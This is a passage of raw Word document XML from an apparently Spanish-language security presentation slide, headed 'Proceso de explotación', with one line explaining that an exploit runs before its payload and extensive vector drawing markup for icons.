          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="840" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9B6729" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:spacing w:line="888" w:lineRule="exact"/>
        <w:ind w:left="6254"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Proceso de explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1721F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="146" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="2612" w:right="1169"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El exploit se ejecuta primero y, si tiene éxito, luego la carga útil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714148F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="540" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="12943" w:space="40"/>
            <w:col w:w="6217"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08659130" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="109"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7F8CBE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:ind w:left="1791" w:right="832"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15742976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="045915AC" wp14:editId="68A12419">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>423672</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>221459</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2908559" cy="1933195"/>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6" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2908559" cy="1933195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15743488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08F2D144" wp14:editId="6652CCAE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>9891734</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>718851</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1136015" cy="106108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015" cy="1061085"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1136015" cy="1061085"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="85" name="Graphic 85"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1136015" cy="1061085"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1136015" h="1061085">
                                <a:moveTo>
                                  <a:pt x="851804" y="946969"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="283934" y="946969"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="283934" y="1060606"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="851804" y="1060606"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="851804" y="946969"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1136015" h="1061085">
                                <a:moveTo>
                                  <a:pt x="681443" y="833333"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="454295" y="833333"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="454295" y="946969"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="681443" y="946969"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="681443" y="833333"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1136015" h="1061085">
                                <a:moveTo>
                                  <a:pt x="1060023" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="75715" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46316" y="5977"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="22241" y="22253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5974" y="46342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="75757"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="757575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5974" y="786991"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="22241" y="811079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46316" y="827355"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75715" y="833333"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1060023" y="833333"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1089422" y="827355"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1113497" y="811079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1129764" y="786991"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1135739" y="757575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1135739" y="719697"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="113573" y="719697"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="113573" y="113636"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1135739" y="113636"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1135739" y="75757"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1129764" y="46342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1113497" y="22253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1089422" y="5977"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1060023" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1136015" h="1061085">
                                <a:moveTo>
                                  <a:pt x="1135739" y="113636"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1022165" y="113636"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1022165" y="719697"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1135739" y="719697"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1135739" y="113636"/>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23383" y="169484"/>
                            <a:ext cx="485140" cy="495300"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="485140" h="495300">
                                <a:moveTo>
                                  <a:pt x="365886" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="242570" y="128143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="119252" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="114935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="127634" y="247523"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="380111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="119252" y="495046"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="242570" y="366903"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="365886" y="495046"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485139" y="380111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357504" y="247523"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485139" y="114935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="365886" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="87" name="Graphic 87"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="323383" y="169484"/>
                            <a:ext cx="485140" cy="495300"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="485140" h="495300">
                                <a:moveTo>
                                  <a:pt x="0" y="114935"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="119252" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="242570" y="128143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="365886" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485139" y="114935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357504" y="247523"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485139" y="380111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="365886" y="495046"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="242570" y="366903"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="119252" y="495046"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="380111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="127634" y="247523"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="114935"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="635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6401E12E" id="Group 84" o:spid="_x0000_s1026" style="position:absolute;margin-left:778.9pt;margin-top:56.6pt;width:89.45pt;height:83.55pt;z-index:15743488;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="11360,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">
                <v:shape id="Graphic 85" o:spid="_x0000_s1027" style="position:absolute;width:11360;height:10610;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1136015,10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" path="m851804,946969r-567870,l283934,1060606r567870,l851804,946969xem681443,833333r-227148,l454295,946969r227148,l681443,833333xem1060023,l75715,,46316,5977,22241,22253,5974,46342,,75757,,757575r5974,29416l22241,811079r24075,16276l75715,833333r984308,l1089422,827355r24075,-16276l1129764,786991r5975,-29416l1135739,719697r-1022166,l113573,113636r1022166,l1135739,75757r-5975,-29415l1113497,22253,1089422,5977,1060023,xem1135739,113636r-113574,l1022165,719697r113574,l1135739,113636xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 86" o:spid="_x0000_s1028" style="position:absolute;left:3233;top:1694;width:4852;height:4953;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="48514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" path="m365886,l242570,128143,119252,,,114935,127634,247523,,380111,119252,495046,242570,366903,365886,495046,485139,380111,357504,247523,485139,114935,365886,xe" fillcolor="red" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 87" o:spid="_x0000_s1029" style="position:absolute;left:3233;top:1694;width:4852;height:4953;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="48514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" path="m,114935l119252,,242570,128143,365886,,485139,114935,357504,247523,485139,380111,365886,495046,242570,366903,119252,495046,,380111,127634,247523,,114935xe" filled="f" strokecolor="#ec7c30" strokeweight=".5pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15744000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11832B25" wp14:editId="701AEE8C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>11103188</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>718851</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="530225" cy="106108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 cy="1061085"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="530225" h="1061085">
                              <a:moveTo>
                                <a:pt x="454295" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="75715" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="46316" y="5977"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="22241" y="22253"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="5974" y="46342"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="75757"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="984848"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="5974" y="1014264"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="22241" y="1038352"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="46316" y="1054628"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="75715" y="1060606"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="454295" y="1060606"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="483694" y="1054628"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="507770" y="1038352"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="524037" y="1014264"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="984848"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="946969"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="265005" y="946969"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="242557" y="942619"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="224545" y="930634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="212566" y="912612"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="208218" y="890151"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="212566" y="867690"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="224545" y="849668"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="242557" y="837683"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="265005" y="833333"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="833333"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="378787"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="75715" y="378787"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="75715" y="265151"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="265151"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="189393"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="75715" y="189393"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="75715" y="75757"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="75757"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="524037" y="46342"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="507770" y="22253"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="483694" y="5977"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="454295" y="0"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="530225" h="1061085">
                              <a:moveTo>
                                <a:pt x="530011" y="833333"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="265005" y="833333"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="287454" y="837683"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="305466" y="849668"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="317444" y="867690"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="321792" y="890151"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="317444" y="912612"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="305466" y="930634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="287454" y="942619"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="265005" y="946969"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="946969"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="833333"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="530225" h="1061085">
                              <a:moveTo>
                                <a:pt x="530011" y="265151"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="454295" y="265151"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="454295" y="378787"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="378787"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="265151"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="530225" h="1061085">
                              <a:moveTo>
                                <a:pt x="530011" y="75757"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="454295" y="75757"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="454295" y="189393"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="189393"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="530011" y="7575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264985" id="Graphic 88" o:spid="_x0000_s1026" style="position:absolute;margin-left:874.25pt;margin-top:56.6pt;width:41.75pt;height:83.55pt;z-index:15744000;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" coordsize="53022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" path="m454295,l75715,,46316,5977,22241,22253,5974,46342,,75757,,984848r5974,29416l22241,1038352r24075,16276l75715,1060606r378580,l483694,1054628r24076,-16276l524037,1014264r5974,-29416l530011,946969r-265006,l242557,942619,224545,930634,212566,912612r-4348,-22461l212566,867690r11979,-18022l242557,837683r22448,-4350l530011,833333r,-454546l75715,378787r,-113636l530011,265151r,-75758l75715,189393r,-113636l530011,75757,524037,46342,507770,22253,483694,5977,454295,xem530011,833333r-265006,l287454,837683r18012,11985l317444,867690r4348,22461l317444,912612r-11978,18022l287454,942619r-22449,4350l530011,946969r,-113636xem530011,265151r-75716,l454295,378787r75716,l530011,265151xem530011,75757r-75716,l454295,189393r75716,l530011,75757xe" fillcolor="black" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15744512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="543E7555" wp14:editId="7B281D1C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>10440678</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-233246</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="626745" cy="76263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762635"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="626745" cy="762635"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="90" name="Graphic 90"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="13972" y="6919"/>
                            <a:ext cx="607060" cy="747395"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="607060" h="747395">
                                <a:moveTo>
                                  <a:pt x="0" y="530788"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="82063" y="619680"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="207329" y="747013"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="432686" y="530788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="293866" y="530788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="293866" y="268616"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="295725" y="196218"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="308739" y="159040"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="344064" y="145343"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="412855" y="143386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="487997" y="177171"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="525872" y="251498"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="539238" y="325826"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="540858" y="359611"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="567901" y="710975"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="591310" y="564137"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="603057" y="465358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="606690" y="369788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="605761" y="232579"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="601041" y="187605"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="588475" y="145974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="568976" y="108303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="543459" y="75208"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="512838" y="47308"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="478027" y="25220"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="439942" y="9561"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="399495" y="948"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357602" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="315176" y="7332"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="273133" y="23562"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223554" y="56896"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173623" y="121384"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="147271" y="190347"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="136975" y="245290"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="135214" y="267715"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="135214" y="530788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="530788"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="171717"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="91" name="Graphic 91"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="626745" cy="762635"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="584220" y="660656"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="588559" y="717031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="588559" y="718237"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="589054" y="715747"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="590211" y="707130"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="592450" y="694245"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="594726" y="676076"/>
